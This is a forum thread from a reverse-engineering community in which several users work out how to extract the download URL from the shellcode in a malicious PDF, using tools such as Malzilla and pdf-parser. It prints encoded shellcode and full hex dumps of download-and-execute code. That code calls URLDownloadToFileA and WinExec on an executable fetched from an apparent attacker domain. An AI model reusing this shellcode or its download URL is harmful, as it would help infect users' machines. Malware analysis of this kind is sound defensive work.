u95ff','%u0152','%u000','0%uea','89%uc','281%u0250','%u0000%u5','052%u','95ff%u0156','%u000','0%u006 ','a%u00','6a%uea89','%uc28','1%u015','e%u0000','%u8952%','u81ea%ua','6c2%u','0002%u5200','%u006a%', 'ud0ff%u','056a%u','ea89%','uc281','%u015e%u','0000%u','ff52%u5a9','5%u0001','%u9d00%u','5f5d%u5a5', 'e%u5b','59%uc358%u','0000%u00','00%u0000%','u0000','%u0000%','u0000%','u0000','%u000','0%u654','7%u 5474%','u6d65','%u5070%u7','461%u4168','%u4c00','%u616f%','u4c64%u62','69%u61','72%u79','72%u0','041 %u654','7%u5074%u','6');


So this looks like the exploit, and ruNE9AoC is the shellcode.

I replaced the ',' in the shellcode and, in Malzilla, did UCS2 to hex. Then I pasted the hex into the hex view and was expecting to find the URL.

Instead, I just see some weird Unicode characters, then at the bottom "GetTempPathA.LoadLibraryA.Getp", and then that's the end of it.

I tried to search for an XOR key using the string "http" and it found nothing. How did you get the download URL from the shellcode?

Thanks!

5aLIVE
August 8th, 2009, 07:42
Quote:
[Originally Posted by h4h4h4h4;82270] I used the inflater.exe tool from didler stevens and decoded all the streams.


Hi,
Can you provide a link to this tool please? The only PDF tools I could find on Didier Stevens' site are PDF-Parser and PDFID.

I am also aware of the PDF Streams Inflater by Boban Spasic (aka bobby).

Thanks,
5aLIVE.

h4h4h4h4
August 10th, 2009, 10:35
I'm sorry, I mixed up my tool authors. The PDF stream inflater tool I used is indeed by Bobby. I was thinking of the PDFID tool by Didier Stevens at the same time.

Can anyone help me find out how the url is obtained from the shellcode?

I searched for XOR keys and can't find any. Normally, when I don't see a URL in a PDF/Flash exploit and I search XOR for the string 'http', Malzilla finds the key and then the URL appears.

Code:


%u5350剑坖鱕崀ㄍ擀䀃砰謌ీ炋괜䂋謉㑀䂍譼㱀坖庾Ā뿮Ŏ훨开襞自廂刀聨＀井褀自廂㄀Ƕ諂㖜ɣﮀ琀蠆㈜웮㈄褀自䗂刀闿Œ슁ɐ偒闿Ŗjj슁Ş襒自磂刀j탿ժ슁Şr媕褀自廂刀聨 ＀井褀自廂㄀Ƕ諂㖜ɮﮀ琀蠆㈜웮㈄褀自䗂刀闿Œ슁ɐ偒闿Ŗjj슁Ş襒自ꛂ刀j탿ժ슁Şr媕鴀彝婞孙썘敇呴浥偰瑡䅨䰀慯䱤扩慲祲A敇側

int0
August 12th, 2009, 03:24
Code:
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F

00000000 53 50 52 51 57 56 9C 55 00 E8 00 00 5D 00 ED 83 SPRQWVU...].
00000010 31 0D 64 C0 40 03 78 30 8B 0C 0C 40 70 8B AD 1C 1.d@.x0..@p*.
00000020 40 8B EB 08 8B 09 34 40 40 8D 8B 7C 3C 40 57 56 @..4@@|<@WV
00000030 5E BE 00 01 01 00 BF EE 01 4E 00 00 EF 01 D6 E8 ^.....N...
00000040 00 01 5F 00 89 5E 81 EA 5E C2 00 01 52 00 80 68 .._.^^..R.h
00000050 00 00 FF 00 4E 95 00 01 89 00 81 EA 5E C2 00 01 ...N...^..
00000060 31 00 01 F6 8A C2 35 9C 02 63 00 00 FB 80 74 00 1..5.c..t.
00000070 88 06 32 1C EB 46 C6 EE 32 04 89 00 81 EA 45 C2 .2.F2..E
00000080 00 02 52 00 95 FF 01 52 00 00 EA 89 C2 81 02 50 ..R..R...P
00000090 00 00 50 52 95 FF 01 56 00 00 00 6A 00 6A EA 89 ..PR.V...j.j
000000A0 C2 81 01 5E 00 00 89 52 81 EA 78 C2 00 02 52 00 .^..Rx..R.
000000B0 00 6A D0 FF 05 6A EA 89 C2 81 01 5E 00 00 FF 52 .j.j.^..R
000000C0 5A 95 00 01 89 00 81 EA 5E C2 00 01 52 00 80 68 Z...^..R.h
000000D0 00 00 FF 00 4E 95 00 01 89 00 81 EA 5E C2 00 01 ...N...^..
000000E0 31 00 01 F6 8A C2 35 9C 02 6E 00 00 FB 80 74 00 1..5.n..t.
000000F0 88 06 32 1C EB 46 C6 EE 32 04 89 00 81 EA 45 C2 .2.F2..E
00000100 00 02 52 00 95 FF 01 52 00 00 EA 89 C2 81 02 50 ..R..R...P
00000110 00 00 50 52 95 FF 01 56 00 00 00 6A 00 6A EA 89 ..PR.V...j.j
00000120 C2 81 01 5E 00 00 89 52 81 EA A6 C2 00 02 52 00 .^..R..R.
00000130 00 6A D0 FF 05 6A EA 89 C2 81 01 5E 00 00 FF 52 .j.j.^..R
00000140 5A 95 00 01 9D 00 5F 5D 5A 5E 5B 59 C3 58 00 00 Z..._]Z^[YX..
00000150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 65 47 ..............eG
00000160 54 74 6D 65 50 70 74 61 41 68 4C 00 61 6F 4C 64 TtmePptaAhL.aoLd
00000170 62 69 61 72 79 72 00 41 65 47 50 74 6F 72 41 63 biaryr.AeGPtorAc
00000180 64 64 65 72 73 73 57 00 6E 69 78 45 63 65 BB 00 dderssW.nixEce.
00000190 F2 89 F7 89 C0 30 75 AE 29 FD 89 F7 31 F9 BE C0 0u)1
000001A0 00 3C 00 00 B5 03 02 1B 00 00 AD 66 85 03 02 1B .<.......*f...
000001B0 00 00 70 8B 83 78 1C C6 B5 03 02 1B 00 00 BD 8D ..px.Ƶ.....
000001C0 02 1F 00 00 03 AD 1B 85 00 02 AB 00 03 AD 1B 85 .....*.....*.
000001D0 00 02 50 00 AD AB 85 03 02 1B 00 00 5E AB DB 31 ..P.*.....^1
000001E0 56 AD 85 03 02 1B 00 00 C6 89 D7 89 FC 51 A6 F3 V*.....Ɖ׉Q
000001F0 74 59 5E 04 EB 43 5E E9 D1 93 03 E0 27 85 00 02 tY^.C^ѓ.'..
00000200 31 00 96 F6 AD 66 E0 C1 03 02 1F 85 00 02 89 00 1.*f......
00000210 AD C6 85 03 02 1B 00 00 EB C3 00 10 00 00 00 00 *ƅ...........
00000220 00 00 00 00 00 00 00 00 00 00 89 00 1B 85 00 02 ..............
00000230 56 00 E8 57 FF 58 FF FF 5E 5F 01 AB 80 CE BB 3E V.WX^_.λ>
00000240 02 74 ED EB 55 C3 4C 52 4F 4D 2E 4E 4C 44 00 4C .tULROM.NLD.L
00000250 52 55 44 4C 77 6F 6C 6E 61 6F 54 64 46 6F 6C 69 RUDLwolnaoTdFoli
00000260 41 65 75 00 64 70 74 61 2E 65 78 65 00 65 72 63 Aeu.dpta.exe.erc
00000270 73 61 2E 68 68 70 00 70 74 68 70 74 2F 3A 61 2F sa.hhp.pthpt/:a/
00000280 6F 64 65 62 75 2D 64 70 74 61 6E 69 2D 67 65 73 odebu-dptani-ges
00000290 76 72 63 69 2E 65 6E 63 6E 2F 6C 75 2F 6C 70 75 vrci.encn/lu/lpu
000002A0 61 64 65 74 70 2E 70 68 69 3F 3D 64 00 32 90 00 adetp.phi?=d.2.


The HTTP URL is stored rotated in the shellcode (each pair of adjacent bytes swapped); you can reverse it with simple code like:

Code:
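/* Byte-rotated copy of the URL string seen in the shellcode dump above: every
 * pair of adjacent bytes is stored in reverse order.  Two explicit NUL bytes
 * terminate it so the pair-wise walk below hits an all-zero pair. */
char hi[] = "thpt/:a/odebu-dptani-gesvrci.encn/lu/lpuadetp.phi?=d\x0\x0";

/* Swap every adjacent pair of bytes in s, in place, stopping at the first pair
 * that contains a NUL byte (a lone NUL already ends a C string, so stopping
 * there is never wrong).  Works on plain chars, so it needs neither the
 * MSVC-only _byteswap_ushort intrinsic nor a char* -> unsigned short* cast
 * (which is an alignment / strict-aliasing problem on other compilers). */
static void swap_byte_pairs(char *s)
{
    for (; s[0] != '\0' && s[1] != '\0'; s += 2) {
        char tmp = s[0];
        s[0] = s[1];
        s[1] = tmp;
    }
}

/* Un-rotates hi in place; the readable URL is left in hi for inspection
 * (e.g. in a debugger), as the original helper did. argc/argv are unused. */
int _tmain(int argc, _TCHAR* argv[])
{
    (void)argc;
    (void)argv;
    swap_byte_pairs(hi);
    return 0;
}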


PS: Sorry for the delayed reply, I was on vacation.

h4h4h4h4
August 12th, 2009, 14:44
blah... I found my problem.

So I was using the PDF inflater tool by Bobby.

cmd > inflater.exe layoutBeenAll.pdf wtf

This creates the folder "wtf" with 13 separate .tmp files, one for each FlateDecode stream. File 11.tmp has the obfuscated JavaScript, but it doesn't capture all of it.

the file is 8kb.

When I use pdf-parser by Didier Stevens, I find the obfuscated JavaScript stream and capture it in a text file called 'full.tmp'; the file size is 44 KB.

DOH!!

Now i get the full shellcode:

Code:

seg000:00000000 53 50 51 52 56 57 55 9C E8 00 00 00 00 5D 83 ED SPQRVWUF....]f
seg000:00000010 0D 31 C0 64 03 40 30 78 0C 8B 40 0C 8B 70 1C AD
1+d@0x @ p
seg000:00000020 8B 40 08 EB 09 8B 40 34 8D 40 7C 8B 40 3C 56 57 @d @4@|@<VW
seg000:00000030 BE 5E 01 00 00 01 EE BF 4E 01 00 00 01 EF E8 D6 +^..e+N..nF+
seg000:00000040 01 00 00 5F 5E 89 EA 81 C2 5E 01 00 00 52 68 80 .._^O-^..Rh
seg000:00000050 00 00 00 FF 95 4E 01 00 00 89 EA 81 C2 5E 01 00 ...*N..O-^.
seg000:00000060 00 31 F6 01 C2 8A 9C 35 63 02 00 00 80 FB 00 74 .1-5c..v.t
seg000:00000070 06 88 1C 32 46 EB EE C6 04 32 00 89 EA 81 C2 45 2Fde2.O-E
seg000:00000080 02 00 00 52 FF 95 52 01 00 00 89 EA 81 C2 50 02 ..R*R..O-P
seg000:00000090 00 00 52 50 FF 95 56 01 00 00 6A 00 6A 00 89 EA ..RP*V..j.j.O
seg000:000000A0 81 C2 5E 01 00 00 52 89 EA 81 C2 78 02 00 00 52 -^..RO-x..R
seg000:000000B0 6A 00 FF D0 6A 05 89 EA 81 C2 5E 01 00 00 52 FF j.*-jO-^..R*
seg000:000000C0 95 5A 01 00 00 89 EA 81 C2 5E 01 00 00 52 68 80 Z..O-^..Rh
seg000:000000D0 00 00 00 FF 95 4E 01 00 00 89 EA 81 C2 5E 01 00 ...*N..O-^.
seg000:000000E0 00 31 F6 01 C2 8A 9C 35 6E 02 00 00 80 FB 00 74 .1-5n..v.t
seg000:000000F0 06 88 1C 32 46 EB EE C6 04 32 00 89 EA 81 C2 45 2Fde2.O-E
seg000:00000100 02 00 00 52 FF 95 52 01 00 00 89 EA 81 C2 50 02 ..R*R..O-P
seg000:00000110 00 00 52 50 FF 95 56 01 00 00 6A 00 6A 00 89 EA ..RP*V..j.j.O
seg000:00000120 81 C2 5E 01 00 00 52 89 EA 81 C2 A6 02 00 00 52 -^..RO-..R
seg000:00000130 6A 00 FF D0 6A 05 89 EA 81 C2 5E 01 00 00 52 FF j.*-jO-^..R*
seg000:00000140 95 5A 01 00 00 9D 5D 5F 5E 5A 59 5B 58 C3 00 00 Z..]_^ZY[X+..
seg000:00000150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 65 ..............Ge
seg000:00000160 74 54 65 6D 70 50 61 74 68 41 00 4C 6F 61 64 4C tTempPathA.LoadL
seg000:00000170 69 62 72 61 72 79 41 00 47 65 74 50 72 6F 63 41 ibraryA.GetProcA
seg000:00000180 64 64 72 65 73 73 00 57 69 6E 45 78 65 63 00 BB ddress.WinExec.+
seg000:00000190 89 F2 89 F7 30 C0 AE 75 FD 29 F7 89 F9 31 C0 BE =0+u)1++
seg000:000001A0 3C 00 00 00 03 B5 1B 02 00 00 66 AD 03 85 1B 02 <.....f
seg000:000001B0 00 00 8B 70 78 83 C6 1C 03 B5 1B 02 00 00 8D BD ..px..+
seg000:000001C0 1F 02 00 00 AD 03 85 1B 02 00 00 AB AD 03 85 1B ....
seg000:000001D0 02 00 00 50 AB AD 03 85 1B 02 00 00 AB 5E 31 DB ..P..^1
seg000:000001E0 AD 56 03 85 1B 02 00 00 89 C6 89 D7 51 FC F3 A6 V..+Qn=
seg000:000001F0 59 74 04 5E 43 EB E9 5E 93 D1 E0 03 85 27 02 00 Yt^CdT^-a'.
seg000:00000200 00 31 F6 96 66 AD C1 E0 02 03 85 1F 02 00 00 89 .1f-a..
seg000:00000210 C6 AD 03 85 1B 02 00 00 C3 EB 10 00 00 00 00 00 ..+d.....
seg000:00000220 00 00 00 00 00 00 00 00 00 00 00 89 85 1B 02 00 ............
seg000:00000230 00 56 57 E8 58 FF FF FF 5F 5E AB 01 CE 80 3E BB .VWFX***_^+>+
seg000:00000240 74 02 EB ED C3 55 52 4C 4D 4F 4E 2E 44 4C 4C 00 tdf+URLMON.DLL.
seg000:00000250 55 52 4C 44 6F 77 6E 6C 6F 61 64 54 6F 46 69 6C URLDownloadToFil
seg000:00000260 65 41 00 75 70 64 61 74 65 2E 65 78 65 00 63 72 eA.update.exe.cr
seg000:00000270 61 73 68 2E 70 68 70 00 68 74 74 70 3A 2F 2F 61 ash.php.http://a
seg000:00000280 64 6F 62 65 2D 75 70 64 61 74 69 6E 67 2D 73 65 dobe-updating-se
seg000:00000290 72 76 69 63 65 2E 63 6E 2F 6E 75 6C 6C 2F 75 70 rvice.cn/null/up
seg000:000002A0 64 61 74 65 2E 70 68 70 3F 69 64 3D 30 00 00 90 date.php?id=0..



Sweet! Thanks. I'll stop using the inflater tool by Bobby.

Next step is to download the trojan and practice RCE on it

d3t0n4t0r
October 12th, 2009, 12:21
Hello,
I'm quite new to analysing malicious PDFs and I want to learn from you guys.

Actually, I am having a hard time getting the shellcode from layoutBeenAll.pdf.
I've tried using inflater.exe but didn't get the decoded shellcode.
I also used pdf-parser.py but same result.
And what tool do you use to analyse the shellcode in hex? I'm using hexdump and hexedit but cannot find the malware URL.

h4h4h4h4
January 14th, 2010, 13:44
Use pdf-parser, not inflater. I had trouble when I used inflater.

pdf-parser.py -fw [pdfname] > dumpfile.txt

open dumpfile.txt, grab the javascript.


Paste it into Malzilla and find the shellcode (the "%u"-encoded string).

Press the "UCS2 to hex" button inside Malzilla; the shellcode turns into hex values.

Paste the hex into the hex view and you can see the URL from the shellcode.

You can also use a "shellcode2exe" tool and load it into IDA pro.

Silkut
January 14th, 2010, 14:11
http://blog.didierstevens.com/programs/pdf-tools/ =)